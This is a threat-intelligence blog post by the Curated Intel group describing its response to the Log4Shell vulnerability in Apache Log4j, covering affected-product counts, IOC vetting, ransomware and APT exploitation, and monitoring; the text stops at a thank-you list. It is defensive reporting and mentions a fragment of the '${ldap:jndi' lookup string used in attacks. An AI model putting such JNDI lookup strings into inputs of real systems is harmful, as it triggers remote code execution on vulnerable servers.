Nightmare Before Christmas - Curated Intel's Response To Log4Shell

 

Written by @BushidoToken@TrevorGiffen | Edited by @SteveD3

On late Thursday, 9 December, security researchers warned of a critical vulnerability with wide ramifications. With a CVSS score of 10.0 (Critical), CVE-2021-44228 is a remote code execution (RCE) vulnerability, dubbed Log4Shell. It lies in the Apache Log4j library, a Java-based logging tool that is widely used in applications the world over. This vulnerability allows an adversary who can control log messages to execute arbitrary code loaded from any threat actor-controlled servers.

Although we are currently seeing widespread mass exploitation, Curated Intel analysts anticipate that state actors and ransomware will use Log4Shell in the long-term. This is because a multitude of Internet of Things (IoT) and operational technology (OT) products, like industrial control systems (ICS) and supervisory control and data acquisition (SCADA), all rely on Log4j and are likely to remain unpatched for quite some time. The UK NCSC highlights that Log4j rather than being a single piece of software - is a software component that’s used by millions of computers worldwide running online services. Adding that this "makes Log4Shell potentially the most severe computer vulnerability in years." (12)

Curated Intel on the Case

Curated Intel is a private trust group of cyber threat intelligence (CTI) and digital forensics and incident response (DFIR) professionals, who share insights and monitor the threat landscape together. Our members come from diverse and varied backgrounds, and having a space to verify information with a 3rd, 4th, or 5th pair of eyes is very useful. This is especially true when a crisis like Log4Shell emerges, where rumours are plentiful and facts are scant.

Curated Intel members first identified the critical vulnerability in Log4j on 9 December and began investigating. After initially being skeptical of the hysteric tweets, we began to see more reports of active exploitation of a 0day in Minecraft. Further research uncovered additional software and platforms Log4j is used by, and we quickly realized the broad impact Log4Shell will have on the Internet as a whole. 

As a community, we wanted to raise awareness and alert other members of the issue. Curated Intel is not a large group, but we fortunately have a global membership of helpful and diligent analysts. Curated Intel is just one of several trust groups in the industry. However, we do hope that by documenting our experience of how we responded to Log4j, we can help other groups organize themselves and contribute to the wider community.

Curated Intel, like many other cybersecurity communities, relies on Discord for our messaging platform. Although some risks are certainly associated with Discord (which we won't go into now) it does the job we want it to. To respond to Log4Shell, we created two channels: one for any developments to the situation and one dedicated to indicators of compromise (IOCs) - more on those later - and we issued a server-wide advisory to all community members to begin investigating Log4Shell.

The members of Curated Intel quickly saw that there was no centralized public source of information regarding threats leveraging Log4Shell. A number of GitHub repositories had sprung up by researchers to track software impacted by Log4Shell, but none were tracking the malware or threat actors exploiting it. Therefore, Curated Intel created our Log4Shell-IOCs GitHub repository to begin tracking every malware, cybercriminal, and APT launching attacks on vulnerable Log4j instances.

Assessing the Scale

CISA's crowdsourced list says at least 566 software products from 91 technology vendors are possibly vulnerable, based on a review of 2199 software products. NCSC-NL's crowdsourced list says at least 454 software products from 99 technology vendors are possibly vulnerable, based on a review of 3394 software products. Swithak identified 106 software products that are vulnerable. All of which are continuously being updated, and can be tracked in spreadsheet formats via our GitHub repository.

Researchers at Google reported that out of all the Java packages they scanned on Maven Central, up to 35,863 were affected by Log4j vulnerabilities - of which there are now four at the time of writing (CVE-2021-44228CVE-2021-45046CVE-2021-4104, and CVE-2021-45105). Log4Shell is not over yet, not by a long stretch.

Indicators of Compromise (IOCs)

IOCs quickly became a point of contention in the community and among CTI analysts trying to track and compile lists for ingestion into other security products to detect and prevent Log4Shell attacks. It seemed like every vendor was firing out lists of IOCs based on anything launching ${ldap:jndi requests. These IOCs included legitimate scans from researchers and national computer emergency response teams (CERTs), as well as the heaps of threats actors jumping on the bandwagon. 

We immediately noticed the issue here, threat actors and researchers alike were using cheap or free virtual private servers (VPS) on large web host and cloud infrastructure services to launch Java Naming and Directory Interface (JNDI) attacks. To make matters worse, many legitimate sites were being spoofed for call-back domains. These two scenarios led to a high number of false positives which were added to lists of IOCs and, in some cases, may have caused outages when a certain cloud service provider was blocked.

As a result of this mayhem, Curated Intel analysts compiled low-to-medium confidence feeds of IOCs provided by vendors and researchers - with the caveat of not adding them to blocklists, but rather watchlists (aka hotlists) for continuous monitoring. These could then be useful for activities such as threat hunting to see which of the Log4Shell exploit sources targeted a network prior to a breach, for example.

Currently, in our GitHub repository, we have compiled sources of IOCs and provided a vetted list of high-fidelity IOCs that are focused on post-exploitation and were filtered by the Equinix Threat Analysis Center (ETAC)™️, as well as an unfiltered list of IOCs suited for MISP ingestion provided by the KPMG-EGYDE CTI team (which earned a shoutout by MISP itself!)

Curated Intel also compiled a list of Threat Reports covering malicious actors and malware leveraging Log4Shell in the wild. These reports add context to what and who is targeting vulnerable Log4j instances and can allow defenders to make their next-step decisions based on threat-informed defenceCurated Intel analysts also enriched the threat report data with additional information in the Threat Profiling table and the Threat Groups table.

Excellent reports were provided by respected organizations with some of the largest telemetries in the world and by experts in their domains. Getting the opinions of these industry leaders is highly valuable while responding to a growing threat that grabbed more headlines each passing day. 

Analysis

After one week of monitoring, it seemed that almost every major type of threat actor had tried their hand at Log4Shell exploitation. Widespread opportunistic attacks began with cryptomining malware and distributed denial of service (DDoS) bots - as it usually does when a critical vulnerability is disclosed that is trivial to exploit. This was shortly followed by ransomware such as Khonsari and TellYouThePass, commodity RATs such as Orcus, PowerShell or Bash reverse shells, and offensive security tools such as Cobalt Strike and Meterpreter

Reports later emerged that multiple advanced persistent threat (APT) actors were leveraging Log4Shell, according to the Microsoft Threat Intelligence Center (MSTIC), CrowdStrike, and Mandiant. APT groups from China and Iran, tracked as Hafnium and Phosphorus respectively, alongside unnamed groups from Turkey and North Korea are launching state-aligned espionage campaigns. 

It has since been revealed that Russian-speaking organized cybercrime groups, such as the operators of Conti ransomware and the Dridex Trojan, have also begun to wield Log4Shell against organizations. The tactics, techniques, and procedures (TTPs) of these threat actors have been mapped to the MITRE ATT&CK framework and shared to the Curated Intel Log4Shell GitHub repository by ETAC analysts - see here.

Fig. 1 - ETAC analysis of cyber threats leveraging Log4Shell within the first week

Spotlight: TellYouThePass Ransomware

A Curated Intel investigation into one of the threats exploiting Log4Shell in the wild also received attention from the InfoSec media (see here and here). Analysts from China reported attacks on vulnerable Log4j instances, but none of the English-speaking world was paying attention. 

Further analysis of IOCs shared online by Curated Intel members revealed and confirmed that the TellYouThePass ransomware was indeed exploiting Log4Shell in the wild to target both Windows and Linux systems, particularly targeting systems in China. The ransomware is also capable of lateral movement through the theft of SSH credentials and OS credential dumping to propagate to other systems it can authenticate with on the local network.

Continuous Monitoring

Like any major cyber threat that is ongoing, CTI analysts perform the OODA Loop, which stands for Observe, Orient, Decide, Act. After Log4Shell was disclosed and attacks emerged, there was a vast amount of new information that was pushed online. Two main veins Curated Intel tapped were the new threats leveraging Log4Shell and useful IOCs shared online.

When a new malware was identified or a new APT was reported as actively leveraging Log4Shell, it was important to make others aware and try to understand, based on previous reports, the actions and objectives of such threats and how this new information may impact the response effort of the organizations we are protecting. 

While continuous monitoring does include checking open-source reports from social media, the mainstream news, and vendor blogs, it is also very useful to tap into closed sources such as what other Curated Intel members were seeing in their telemetry or what sources in other trust groups were reporting. As long as the Traffic Light Protocol  (TLP) is adhered to by all parties, this type of intelligence could be vital to stopping a breach and should be encouraged.

Fig. 2 - Statistics of traffic to the Curated Intel GitHub repository as of 20 December 2021

Our GitHub repository has now been viewed over 35,000 times. We are very pleased with the idea that at least some of those visitors found our repository useful. Log4Shell will put many teams to the test this Christmas, especially with federal directives by CISA calling for a Christmas Eve deadline. Therefore, we hope that this resource has eased the pressure off of some and helped others with their own intelligence collection and analysis plans.

Spreading the Word

As we presented our research and response effort to the public via GitHub and social media, we decided to spread the word. And as we did, national CERTs, CTI companies, the InfoSec media, and forums helped spread it too. Log4Shell is legitimately an information security crisis with an extremely broad attack surface with very long-lasting effects.

Curated Intel thanks the following organizations for spreading the word: